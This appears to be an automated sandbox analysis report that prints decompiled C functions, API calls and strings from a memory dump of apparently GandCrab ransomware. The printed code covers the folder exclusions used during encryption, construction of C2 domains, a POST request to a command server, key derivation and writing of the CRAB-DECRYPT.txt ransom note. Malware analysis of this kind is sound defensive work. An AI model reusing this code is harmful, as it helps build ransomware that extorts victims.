				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F1481F0(_t52, L"\\ProgramData\\") != 0 || E0F1481F0(_t52, L"\\IETldCache\\") != 0 || E0F1481F0(_t52, L"\\Boot\\") != 0 || E0F1481F0(_t52, L"\\Program Files\\") != 0 || E0F1481F0(_t52, L"\\Tor Browser\\") != 0 || E0F1481F0(_t52, L"Ransomware") != 0 || E0F1481F0(_t52, L"\\All Users\\") != 0 || E0F1481F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0F1481F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0F1481F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0f146791
0x0f1467a0
0x0f1467a9
0x0f1468d4
0x0f1468dd
0x0f1468e8
0x0f14683b
0x0f146842
0x0f146849
0x00000000
0x0f14684f
0x0f14684f
0x0f146855
0x0f146856
0x0f146858
0x0f146859
0x0f14685e
0x0f14686d
0x0f14686f
0x0f146871
0x0f146872
0x0f146878
0x0f146887
0x0f146889
0x0f14688b
0x0f14688c
0x0f146892
0x0f1468a1
0x0f1468a3
0x0f1468a5
0x0f1468a6
0x0f1468ac
0x0f1468c8
0x0f1468d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0f14685e
0x0f146849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F146E06,00000000,?,?), ref: 0F146874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F146E06,00000000,?,?), ref: 0F14688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F146E06,00000000,?,?), ref: 0F1468A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F146E06,00000000,?,?), ref: 0F1468C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F146E06,00000000,?,?), ref: 0F1468DD

Strings

\Local Settings\, xrefs: 0F146827
\IETldCache\, xrefs: 0F1467AF
\Boot\, xrefs: 0F1467C3
\ProgramData\, xrefs: 0F146799
Ransomware, xrefs: 0F1467FF
\Windows\, xrefs: 0F14683B
\Program Files\, xrefs: 0F1467D7
\All Users\, xrefs: 0F146813
\Tor Browser\, xrefs: 0F1467EB

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 120e8aed4a7f5a0d87411793372668ee878a13f1cd89df64d180b94e2745df50
Instruction ID: a19bb2b7cdc2d2800e985c6a72e00cfcbb3476497575e4060e94128b0ac170ce
Opcode Fuzzy Hash: 120e8aed4a7f5a0d87411793372668ee878a13f1cd89df64d180b94e2745df50
Instruction Fuzzy Hash: 4531012074076227ED2432670D25B6F855A8FE6E59F504025AB01EF6C3FF58F93387AA

Uniqueness

Uniqueness Score: -1.00%

Function 0F145220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F145220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf150540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xf150520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F145060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0f145226
0x0f145236
0x0f145241
0x0f145246
0x0f14524c
0x0f14525b
0x0f145261
0x0f145266
0x0f14526d
0x0f145273
0x0f14527a
0x0f145281
0x0f145285
0x0f145288
0x0f14528e
0x0f145290
0x0f145295
0x0f14529b
0x0f14529d
0x0f1452a2
0x0f1452a4
0x0f1452a4
0x0f1452a8
0x0f1452a9
0x0f1452af
0x0f1452b4
0x0f1452b6
0x0f1452b9
0x0f1452b9
0x0f1452be
0x0f1452c5
0x0f1452c5
0x0f1452ec
0x0f1452ef
0x0f1452f1
0x0f1452f6
0x0f1452ff
0x0f145307
0x00000000
0x00000000
0x0f145310
0x0f145316
0x0f145319
0x0f145319
0x0f14531e
0x0f145328
0x0f145339
0x0f14533f
0x0f14533f
0x0f145347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F145288
Sleep.KERNEL32(000003E8), ref: 0F1452C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1452D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1452E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1452FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145310
wsprintfW.USER32 ref: 0F145328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145339

Strings

.bit, xrefs: 0F14527A
m.bi, xrefs: 0F145266
gdcb, xrefs: 0F145273
fabian wosar <3, xrefs: 0F1452F9
t, xrefs: 0F14526D
t, xrefs: 0F14525B

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: 624d29e3e39ef5e97a9f7c68cd2ce0f191fdca38bf41d7915906690c15a2df3b
Instruction ID: 8d91742fd5fb4a6cb00237ff480b8e30281df212c34898dc9b085820fa03c38f
Opcode Fuzzy Hash: 624d29e3e39ef5e97a9f7c68cd2ce0f191fdca38bf41d7915906690c15a2df3b
Instruction Fuzzy Hash: 3C31D575E40309EBDB00CFA4ED85BAEBB78EF88721F100125F605A7281D7786A548B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1454F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0F1454F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F147E40( &_v28);
				_v16 = E0F145220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xf14fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xf14fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xf14fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xf14fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xf14fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xf14fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0F148050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0F1453D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0f1454f8
0x0f1454fa
0x0f145501
0x0f145504
0x0f14550f
0x0f145525
0x0f14552c
0x0f145542
0x0f145546
0x0f14554b
0x0f145558
0x0f145558
0x0f14555a
0x0f14555e
0x0f145564
0x0f14556d
0x0f145572
0x0f14557a
0x0f14557f
0x0f145587
0x0f14558c
0x0f145594
0x0f145599
0x0f1455a1
0x0f1455a6
0x0f1455ae
0x0f1455b3
0x0f1455bc
0x0f1455c5
0x0f1455c9
0x0f1455ca
0x0f1455d2
0x0f1455d7
0x0f1455e1
0x0f1455e2
0x0f1455e3
0x0f1455e9
0x0f1455ee
0x0f1455f6
0x0f1455fc
0x0f145601
0x0f145609
0x0f145617
0x0f145627
0x0f145619
0x0f145619
0x0f14561e
0x0f145623
0x0f145623
0x0f14561e
0x0f145617
0x0f145601
0x0f145637
0x0f145643
0x0f14564d
0x0f14564f
0x0f145654
0x0f145657
0x0f145657
0x0f145665
0x0f145665
0x0f14554d
0x0f145552
0x00000000
0x0f145554
0x0f145554
0x00000000
0x0f145554

APIs

Part of subcall function 0F147E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
Part of subcall function 0F147E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D

Part of subcall function 0F145220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F145288
Part of subcall function 0F145220: Sleep.KERNEL32(000003E8), ref: 0F1452C5
Part of subcall function 0F145220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F1452D3
Part of subcall function 0F145220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F1452E3
Part of subcall function 0F145220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F1452FF
Part of subcall function 0F145220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145310
Part of subcall function 0F145220: wsprintfW.USER32 ref: 0F145328
Part of subcall function 0F145220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145339

lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F145512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F145532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F145544
lstrcatA.KERNEL32(00000000,?), ref: 0F14555E
lstrlenA.KERNEL32(00000000), ref: 0F1455B3
lstrlenW.KERNEL32(?), ref: 0F1455BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F1455DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F145643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F14564D
InternetCloseHandle.WININET(0F14581B), ref: 0F145657

Strings

popkadurak, xrefs: 0F1455E9
POST, xrefs: 0F1455CA

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 480ad2da5bb269fe5f59a08f3fbff8a253026a78838eaaf196424439b87fcb40
Instruction ID: 8c8fa093f0b72c2a2dd2782519082412607419f979909c6a2c46d6b34bbfbeb9
Opcode Fuzzy Hash: 480ad2da5bb269fe5f59a08f3fbff8a253026a78838eaaf196424439b87fcb40
Instruction Fuzzy Hash: 4341C075E40309ABEB109FA8DC41FEE7B79AFC8751F140115EA04B7241EB787698CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0F1472A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F1472A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0f1472a0
0x0f1472a8
0x0f1472aa
0x0f1472ae
0x0f1472b3
0x0f1472c1
0x0f1472c4
0x0f1472c9
0x0f1472c9
0x0f1472cf
0x0f1472d9
0x0f1472e0
0x0f1472e4
0x0f1472e7
0x0f1472e7
0x0f1472ed
0x0f1472fb
0x0f1472fd
0x0f147305
0x0f147308
0x0f147308
0x0f14730e
0x0f14731c
0x0f14731e
0x0f147326
0x0f147329
0x0f147329
0x0f14732f
0x0f14733d
0x0f14733f
0x0f147347
0x0f14734a
0x0f14734a
0x0f147350
0x0f14735e
0x0f147360
0x0f147368
0x0f14736b
0x0f14736b
0x0f147371
0x0f14737f
0x0f147381
0x0f147389
0x0f14738c
0x0f14738c
0x0f147392
0x0f1473a0
0x0f1473a2
0x0f1473aa
0x0f1473ad
0x0f1473ad
0x0f1473b3
0x0f1473b5
0x0f1473b5
0x0f1473bc
0x0f1473ca
0x0f1473cc
0x0f1473d4
0x0f1473d7
0x0f1473d7
0x0f1473e0
0x0f14740c
0x0f1473e2
0x0f1473e8
0x0f147406
0x0f147406

APIs

lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473E8
lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473F6

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: a9c809e9d0ba6f1db82ead263ad7cd12837d4b09f419787ac01b84e6aced0d05
Instruction ID: c8efc062da3f59d813ff0bab75844c69a122068ab0bafc97016907a77bd4364e
Opcode Fuzzy Hash: a9c809e9d0ba6f1db82ead263ad7cd12837d4b09f419787ac01b84e6aced0d05
Instruction Fuzzy Hash: 64414F36140652EFD7129FB8DE8C794BBA1FF44326F094534E40683A61D776B8B8DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F145F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0F145F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xf152a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0F149170( &_v267, 0, 0xff);
					E0F145DC0( &_v268, _t31, lstrlenA(_t31));
					E0F145E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0f145f09
0x0f145f1b
0x0f145f1e
0x0f145f20
0x0f145f29
0x0f145f2d
0x0f145f38
0x0f145f40
0x0f145f49
0x0f145f6c
0x0f145f72
0x0f145f75
0x0f145f81
0x0f145f8b
0x0f145fa3
0x0f145fb3
0x0f145fc3
0x0f145fc3
0x0f145fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F145F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F145F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F145F49
lstrlenA.KERNEL32(00000000), ref: 0F145F54
wsprintfA.USER32 ref: 0F145F6C
_memset.LIBCMT ref: 0F145F8B
lstrlenA.KERNEL32(00000000), ref: 0F145F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F145FC3

Strings

RtlComputeCrc32, xrefs: 0F145F43
ntdll.dll, xrefs: 0F145F33
%Xeuropol, xrefs: 0F145F66

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: f0874cf3b31b618b3d1d78814e9834659d8bfa9739f91332ea22a23967c30131
Instruction ID: c35a3ebf1c435ae8cd002dfada9883d9ac1ebdabc507084e4e6b44014ef9d1ed
Opcode Fuzzy Hash: f0874cf3b31b618b3d1d78814e9834659d8bfa9739f91332ea22a23967c30131
Instruction Fuzzy Hash: 6C112B39E84304BBD7205FA4AC49FAE7B78AFC4B11F140064F905E2281DB7879A59E51

Uniqueness

Uniqueness Score: -1.00%

Function 0F146D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F146D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf152a64; // 0xf152000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf152a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0f146d5b
0x0f146d63
0x0f146d85
0x0f146d8a
0x0f146d9e
0x0f146da5
0x0f146dbe
0x0f146dbe
0x0f146dc5
0x0f146dcb
0x0f146d8c
0x0f146d99
0x0f146d99
0x0f146dd8
0x0f146de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F146E22,00000000,?,?), ref: 0F146D55
wsprintfW.USER32 ref: 0F146D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F146D7F
GetLastError.KERNEL32(?,?), ref: 0F146D8C
lstrlenW.KERNEL32(0F152000,?,00000000,?,?), ref: 0F146DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F146DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0F146DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F146DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0F146D5D

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
